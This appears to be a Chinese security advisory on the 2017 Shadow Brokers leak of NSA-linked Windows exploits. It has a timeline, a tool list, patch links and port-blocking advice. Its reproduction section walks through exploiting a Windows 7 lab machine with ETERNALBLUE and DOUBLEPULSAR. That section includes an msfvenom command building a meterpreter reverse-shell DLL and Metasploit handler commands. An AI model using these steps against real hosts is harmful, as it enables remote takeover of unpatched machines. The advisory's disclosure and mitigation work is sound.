【高危预警】Shadow broker泄露机密文件始末及技术分析

早在2016年，黑客组织 Shadow Brokers声称攻破了为NSA开发网络武器的美国黑客团队Equation Group，并公开拍卖据称为美国政府使用的黑客工具。

为了证明自己的说法，Shadow Brokers贴出似乎为针对路由器安全软件的攻击代码。该组织表示，如果得到100万比特币(现价约合5.68亿美元)，将公开这些工具(它的比特币地址目前只有0.12 BTC)。

网络安全专家怀疑该组织是否获得了其所宣称的黑客工具，不过几位专家称，该组织所公布的代码看起来像是真的。该事件对五家路由器制造商造成影响，即三家美国公司──思科、瞻博网络(Juniper)、Fortinet和两家中国公司── 西网云信息技术有限公司、北京天融信网络安全技术有限公司。

北京时间2017年4月14日夜间，该组织在多次出售无果的情况下再次放出EQGRP_Lost_in_Translation文件，该文件包括多个Windows 0day，0day多为远程利用，评级为严重，可以覆盖大部分windows服务器。

历史回溯

2016年8月

释放“eqgrp-free-file.tar.xz.gpg“和”eqgrp-auction-file.tar.xz.gpg“两个文件，其中提供了第一个a文件的密码

2017年4月9日

“eqgrp-auction-file.tar.xz.gpg”文件解开密码

2017年4月14日

再次释放“EQGRP_Lost_in_Translation”文件

事件分析

这次的文件有三个目录，分别为“Windows”、“Swift” 和 “OddJob”，包含一堆令人震撼的黑客工具（我们挑几个重要的列举如下）：

1、EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具。

2、ETERNALROMANCE 是 SMB1 的重量级利用，可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。

3、除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、

ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序，可以攻击开放了 445 端口的 Windows 机器。

4、ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具，可以攻击开放了3389 端口且开启了智能卡登陆的 Windows XP 和 Windows 2003 机器。

5、FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。

6、ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。

7、ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具。

8、ESKIMOROLL 是 Kerberos 的漏洞利用攻击，可以攻击 Windows

2000/2003/2008/2008 R2 的域控制器。

复现过程

环境搭建

注意，必须按照python2.6相关版本，其他版本不奏效。

下载python2.6并安装

下载pywin32并安装

将C:\Python26添加到环境变量PATH中。

配置环境

将EQGRP_Lost_in_Translation下载到的文件解压，找到\windows\fb.py，将，下图中两个部分注释掉。

实验环境

攻击机1：192.168.71.133，winserver 2008，32bit

攻击机2：192.168.71.130 kali2

靶机：192.168.199.107，win7 64bit

利用步骤

在靶机1（192.168.71.133）中安装好python、pywin32以及NSA工具，在

C:\shadowbroker-master\windows 中执行fb.py：

分别设置攻击IP地址192.168.199.107，回调地址192.168.71.133（攻击机1），关闭重定向，设置日志路径，新建或选择一个project：

接下来输入命令：

useETERNALBLUE

依次填入相关参数，超时时间等默认参数可以直接回车：

由于靶机是win7 系统，在目标系统信息处选择1：win72k8r2

模式选1：FB

确认信息，执行

成功后，接着运行use Doublepulsar：

并依次填入参数，注意在function处选择2，rundll

同时在攻击机2 kali的msfvenom 生成攻击dll：

msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

接着执行：

$ msfconsole

msf > useexploit/multi/handler

msf > set LHOST192.168.71.130

msf > set LPORT 5555

msf > set PAYLOADwindows/x64/meterpreter/reverse_tcp

msf > exploit

同时将生成的go.dll上传到攻击机1（192.168.71.133），回到攻击机1，填入攻击dll路径：

接下来一路回车，执行攻击

回到kali，获得shell，攻击成功：

修复方案

1.临时规避措施：关闭135、137、139、445，3389端口开放到外网。推荐使用安全组策略禁止135.137.139.445端口；3389端口限制只允许特定IP访问。

2.及时到微软官网下载补丁升级,微软官方公告连接：

https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

微软已经发出通告 ，强烈建议用户更新最新补丁：

MS17-010 ： 严重 - Microsoft Windows SMB 服务器安全更新 (4013389)

https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

MS14-068 ：严重 - Kerberos 漏洞可能允许特权提升 (3011780)

https://technet.microsoft.com/library/security/MS14-068

MS10-061：严重 - 打印后台程序服务中的漏洞可能允许远程执行代码

https://technet.microsoft.com/library/security/ms10-061

MS09-050 ：严重 - SMBv2 中的漏洞可能允许远程执行代码 (975517)

https://technet.microsoft.com/library/security/ms09-050

MS08-067 ：严重 - 服务器服务中的漏洞可能允许远程执行代码 (958644)

https://technet.microsoft.com/library/security/ms08-067